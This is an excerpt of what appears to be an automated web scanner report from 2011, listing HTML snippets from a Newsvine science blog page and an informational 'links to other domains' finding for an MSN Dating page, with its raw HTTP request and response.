<div class="normal"><a href="http://aaronvabch.newsvine.com/">aaronvabch</a>
...[SNIP]...
<div class="normal"><a href="http://lvtucker.newsvine.com/">Barlow-1919963</a>
...[SNIP]...
<div class="normal"><a href="http://KeithMears.newsvine.com/">Keith Mears</a>
...[SNIP]...
<div class="normal"><a href="http://styro.newsvine.com/">Styro</a>
...[SNIP]...
<div class="normal"><a href="http://SSSIXXX.newsvine.com/">SSSIXXX</a>
...[SNIP]...
<div class="normal"><a href="http://D2847352.newsvine.com/">D-2847352</a>
...[SNIP]...
<div class="normal"><a href="http://TheSlowPlaya.newsvine.com/">TheSlowPlaya</a>
...[SNIP]...
<div class="normal"><a href="http://TheSlowPlaya.newsvine.com/">TheSlowPlaya</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MikeyMike.newsvine.com/">MikeyMike</a>
...[SNIP]...
<div class="normal"><a href="http://Vengeance187.newsvine.com/">Vengeance187</a>
...[SNIP]...
<div class="normal"><a href="http://kclaass.newsvine.com/">kclaass</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://LouisJ.newsvine.com/">LouisJ</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fishkiller3005048.newsvine.com/">fish killer-3005048</a>
...[SNIP]...
<div class="normal"><a href="http://tha-pyngwyn.newsvine.com/">ThaPyngwyn</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://kristenwinslet.newsvine.com/">Kristen Ann Winslet</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://scaughtpar.newsvine.com/">scaughtpar</a>
...[SNIP]...
<div class="normal"><a href="http://kennethsmartasthecome.newsvine.com/">kenneth smart as the come</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://smlong.newsvine.com/">smlong</a>
...[SNIP]...
<div class="normal"><a href="http://clydehicksjr.newsvine.com/">clyde hicks jr.</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://HankE.newsvine.com/">HankE</a>
...[SNIP]...
<div class="normal"><a href="http://fishkiller3005048.newsvine.com/">fish killer-3005048</a>
...[SNIP]...
<div class="normal"><a href="http://Stone3007194.newsvine.com/">Stone-3007194</a>
...[SNIP]...
<div class="normal"><a href="http://BlueVegas.newsvine.com/">BlueVegas</a>
...[SNIP]...
<div class="normal"><a href="http://RockyMtnEve.newsvine.com/">RockyMtnEve</a>
...[SNIP]...
<div class="normal"><a href="http://garrettb1.newsvine.com/">GarrettB</a>
...[SNIP]...
<div class="normal"><a href="http://PaulDoughton.newsvine.com/">Paul Doughton</a>
...[SNIP]...
<div class="normal"><a href="http://mossdog420m.newsvine.com/">Megalodon-358694</a>
...[SNIP]...
<div class="normal"><a href="http://Kate2334454.newsvine.com/">PGH</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://corebela.newsvine.com/">corebela</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://dinali.newsvine.com/">dinali</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://alanstatic.newsvine.com/">alan_static</a>
...[SNIP]...
<div class="normal"><a href="http://KILLSOMEONEWITHBUTTER.newsvine.com/">KILL SOMEONE WITH BUTTER</a>
...[SNIP]...
<div class="normal"><a href="http://KILLSOMEONEWITHBUTTER.newsvine.com/">KILL SOMEONE WITH BUTTER</a>
...[SNIP]...
<div class="normal"><a href="http://malem2us.newsvine.com/">koolminx</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://rich-1210649.newsvine.com/">Rich-1210649</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Daveyo.newsvine.com/">Daveyo</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://elois2.newsvine.com/">Elois</a>
...[SNIP]...
<div class="normal"><a href="http://HankE.newsvine.com/">HankE</a>
...[SNIP]...
<div class="normal"><a href="http://CarterSecurity.newsvine.com/">CarterSecurity</a>
...[SNIP]...
<div class="normal"><a href="http://vlado2.newsvine.com/">Vlado</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://KILLSOMEONEWITHBUTTER.newsvine.com/">KILL SOMEONE WITH BUTTER</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Bobbythemexicanamerican.newsvine.com/">Bobby the mexican american</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Daveyo.newsvine.com/">Daveyo</a>
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://Sonya3007109.newsvine.com/">Sonya-3007109</a>
...[SNIP]...
<div class="normal"><a href="http://BestnewsIveheardinawhile.newsvine.com/">Best news I've heard in awhile.</a>
...[SNIP]...
<div class="normal"><a href="http://Aneeta15.newsvine.com/">Aneeta15</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://GaryTesta.newsvine.com/">Gary Testa</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://curbview.newsvine.com/">curbview</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://fls13.newsvine.com/">Frank-397572-786798</a>
...[SNIP]...
<p><a href="http://ufopartisan.blogspot.com/">http://ufopartisan.blogspot.com/</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://davidam1262.newsvine.com/">david1262</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Aneeta15.newsvine.com/">Aneeta15</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://KILLSOMEONEWITHBUTTER.newsvine.com/">KILL SOMEONE WITH BUTTER</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://karololszynski.newsvine.com/">karol olszynski</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Bobbythemexicanamerican.newsvine.com/">Bobby the mexican american</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Daveyo.newsvine.com/">Daveyo</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://incredulousaussie.newsvine.com/">Incredulous Aussie</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikes12.newsvine.com/">Mike S.-2262427</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Bobbythemexicanamerican.newsvine.com/">Bobby the mexican american</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Pin3Hot.newsvine.com/">Pin3Hot</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://yourekidding-1544479.newsvine.com/">Yourekidding-1544479</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ipan2.newsvine.com/">iPan</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Daveyo.newsvine.com/">Daveyo</a>
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://Daveyo.newsvine.com/">Daveyo</a>
...[SNIP]...
<div class="normal"><a href="http://smitch3006997.newsvine.com/">smitch-3006997</a>
...[SNIP]...
<div class="normal"><a href="http://halowain.newsvine.com/">Hal Sherman</a>
...[SNIP]...
<div class="normal"><a href="http://Viaggiatore.newsvine.com/">Viaggiatore</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://Sancho79.newsvine.com/">Sancho79</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mollie1m.newsvine.com/">DelFairchild-1968594</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://freedom4everyone.newsvine.com/">Freedom4Everyone</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ipan2.newsvine.com/">iPan</a>
...[SNIP]...
<div class="normal"><a href="http://Sancho79.newsvine.com/">Sancho79</a>
...[SNIP]...
<div class="normal"><a href="http://Sancho79.newsvine.com/">Sancho79</a>
...[SNIP]...
<div class="normal"><a href="http://freedom4everyone.newsvine.com/">Freedom4Everyone</a>
...[SNIP]...
<div class="normal"><a href="http://Bobbythemexicanamerican.newsvine.com/">Bobby the mexican american</a>
...[SNIP]...
<div class="normal"><a href="http://Daveyo.newsvine.com/">Daveyo</a>
...[SNIP]...
<div class="normal"><a href="http://thebradley.newsvine.com/">thebradley</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://kwilliams420.newsvine.com/">Keith W Seattle WA</a>
...[SNIP]...
<p>While I wish it was an authentic video, everyone really needs to look at <a href="http://blogs.howstuffworks.com/2011/01/31/the-jerusalem-ufo-at-dome-of-the-rock-on-january-28-2011/"><a href="http://blogs.howstuffworks.com/2011/01/31/the-jerusalem-ufo-at-dome-of-the-rock-on-january-28-2011/">http://blogs.howstuffworks.com/2011/01/31/the-jerusalem-ufo-at-dome-of-the-rock-on-january-28-2011/</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Daveyo.newsvine.com/">Daveyo</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://jimseida.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/cycler-1339318757.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.msn.com/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.msn.com/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

17.75. http://dating.msn.com/index.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://dating.msn.com
Path:	/index.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269

The response contains the following links to other domains:

http://cp.match.com/cppp/msn/ad/static/47891/success.jpg
http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css
http://cp.match.com/cppp/msn/index/47981/btn.gif
http://cp.match.com/cppp/msn/index/47981/chemarr.gif
http://cp.match.com/cppp/msn/index/55688/chem1.jpg
http://cp.match.com/cppp/msn/index/56452/56452.css
http://cp.match.com/cppp/msn/js/google.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js
http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js
http://cp.match.com/scripts/jquery.shuffle.js
http://download.live.com/?sku=messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://images.match.com/match/matchscene/articles/spotlight100_24712.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24714.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24715.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24716.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24717.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24718.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24719.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24720.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24721.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24722.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24723.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24724.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24725.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24726.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24727.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24728.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24729.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24730.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24731.jpg
http://images.match.com/match/matchscene/articles/spotlight100_24782.jpg
http://images.match.com/match/msn/cobrand/poweredby_Match.png
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.chemistry.com/cp/landing/44762?trackingid=516068&bannerid=2053369
http://msn.chemistry.com/index.aspx?trackingid=516068&bannerid=2053368
http://msn.chemistry.com/login/login.aspx?trackingid=516068&bannerid=2008010
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportaldating.112.2o7.net/b/ss/msnportaldating/1/H.1--NS/0
http://passport.match.com/passport/ppLogin.asp
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search?FORM=AX
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bing.com/videos/watch/video/2011-sag-awards-style-showdown/17watcenc?q=sag+awards&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr1-3
http://www.delish.com/
http://www.delish.com/entertaining-ideas/party-ideas/super-bowl-appetizers?ocid=xnetr1-2
http://www.followmsn.com/?ocid=TXT_MSNCH_DATING_FollowMSN
http://www.good.is/post/wal-mart-geogirl-eco-friendly-make-up-line-targets-tweens?ocid=xnetr1-5
http://www.myhomemsn.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /index.aspx?TrackingID=516163&BannerID=670269 HTTP/1.1
Host: dating.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 01 Feb 2011 15:31:26 GMT
Server: Microsoft-IIS/6.0
P3p: CP="NOI DSP COR NID CUR OUR NOR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: Match=CCount=1&CDate=2/1/2011; expires=Wed, 01-Feb-2012 15:31:26 GMT; path=/
Set-Cookie: dMatch=CCount=1&CDate=2/1/2011; domain=match.com; expires=Wed, 01-Feb-2012 15:31:26 GMT; path=/
Set-Cookie: MatchSession=CDTF=2/1/2011&UMID=ddea85a1-68e3-4734-91f3-b0e291054de1; expires=Wed, 01-Feb-2012 15:31:26 GMT; path=/
Set-Cookie: SECU=TID=516163&ESID=0bfa8bd5-e4a1-492c-b08c-c9e300dacfa2&THEME=215; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43992

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<html>
<head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><link href="/styles/site/core.css?v=8.0.4048.22087" rel="st
...[SNIP]...
<meta name="description" content="MSN Dating & Personals with Match.com is a leading online dating site for singles to search through over 15 million users." />
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/google.js"></script>
<script type="text/javascript" src="http://cp.match.com/scripts/jquery.shuffle.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/index/56452/56452.css" rel="stylesheet" type="text/css" />
<style>
...[SNIP]...
<noscript><img
src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.mozcompat.2010.js"></script>

<script type="text/javascript" src="http://cp.match.com/cppp/msn/js/lib.msn.cobrand.core.2010.js"></script>
...[SNIP]...
</script>
<link href="http://cp.match.com/cppp/msn/css/lib.msn.cobrand.hdr.2010.css" rel="stylesheet" type="text/css" />


...[SNIP]...
<div><img src="http://msnportaldating.112.2O7.net/b/ss/msnportaldating/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/golf">Golf</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb"> MLB</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nascar ">NASCAR</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nba">NBA</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cbk"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home"><strong>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
